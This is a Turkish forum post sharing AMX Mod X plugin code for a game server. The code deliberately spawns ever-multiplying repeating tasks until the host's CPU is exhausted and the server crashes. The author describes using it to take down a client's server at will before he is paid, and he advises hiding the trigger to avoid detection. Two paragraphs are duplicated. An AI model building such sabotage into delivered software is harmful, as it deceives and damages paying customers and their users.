Smash
2 Beğeni
Öyle bir şey ki bir sunucuyu istediğin zaman çökertmek için harika bir yöntem.
"set_task" çok kullanılan ve neredeyse hiçbir firmanın yasaklamayacağı bir fonksiyon. Eklenti ücretini henüz almamışken aşağıdaki koda benzer bir yöntemle istediğim zaman serveri kapatabiliyorum. Tabii yakalanmamak için "register_clcmd" komutu yerine daha iyi bir yöntem kullanmalısınız.
Bu eklentide bir zaman sonra komutlar sınırsıza giderek yaklaşarak artıyor ve serverin kurulu olduğu makine bunun hızına yetişemiyor. Eklentiyi test edecek olursanız pinglerin giderek arttığını ve saldırı makinelerinin yaptığı işlevi (flood) bu eklenti aracılığıyla yapabiliyoruz. Hiçbir fark edilir yanı yok ve "register_clcmd" yönteminden farklı bir yöntem bulabilirseniz (bu yöntemin yaygınlaşması zararlı olduğu için paylaşmayacağım) yakalanması mümkün değil. Ayrıca bu yöntem panelin tamamen kapanmasına yol açıyor ve bunu düzeltmesi zorlayıcı.
Cpu kullanımı açısından zorlayacak en iyi eklenti benim bu yaptığım. Trendyol gibi firmaların bulunduğu binalardaki yazılımı işleyecek makineler çok kuvvetli. Yazılımını yapan arkadaşım optimizasyon bilmesine rağmen bunu tamamen zaman kaybı olarak görüyor ve kullanmıyor, çünkü fazla güçlü. Bizim kullandığımız makinelere gelirsek bizim için ping değerleri önemli ve bunu zorlamamak en iyi tercih olacaktır.
"set_task" çok kullanılan ve neredeyse hiçbir firmanın yasaklamayacağı bir fonksiyon. Eklenti ücretini henüz almamışken aşağıdaki koda benzer bir yöntemle istediğim zaman serveri kapatabiliyorum. Tabii yakalanmamak için "register_clcmd" komutu yerine daha iyi bir yöntem kullanmalısınız.
PHP Kod:
#include <amxmodx>
#include <amxmisc>
#define PLUGIN "Ornek"
#define VERSION "1.0"
#define AUTHOR "Smash"
new syncObj;
public plugin_init() {
register_plugin(PLUGIN, VERSION, AUTHOR)
register_clcmd("baslat" , "Toplanti",ADMIN_RCON)
register_clcmd("say /reklambitti" , "ToplantiBitti",ADMIN_RCON)
syncObj = CreateHudSyncObj()
}
public Toplanti(id){
set_task(2.0, "ToplantiUyarisi", 0,_, _, "a",5);
}
public ToplantiUyarisi(id){
set_hudmessage(random_num(0,255),random_num(0,255),random_num(0,255), -1.0, 0.33, 0, 1.0, 1.0)
ShowSyncHudMsg(0, syncObj,"")
set_task(3.0, "ToplantiUyarisi", 0,_, _, "b");
}
public ToplantiBitti(id){
for(new i; i<33; i++) {
if(task_exists(i)) remove_task(i)
}
}
public client_disconnect(id){
remove_task(id);
}
Cpu kullanımı açısından zorlayacak en iyi eklenti benim bu yaptığım. Trendyol gibi firmaların bulunduğu binalardaki yazılımı işleyecek makineler çok kuvvetli. Yazılımını yapan arkadaşım optimizasyon bilmesine rağmen bunu tamamen zaman kaybı olarak görüyor ve kullanmıyor, çünkü fazla güçlü. Bizim kullandığımız makinelere gelirsek bizim için ping değerleri önemli ve bunu zorlamamak en iyi tercih olacaktır.
)

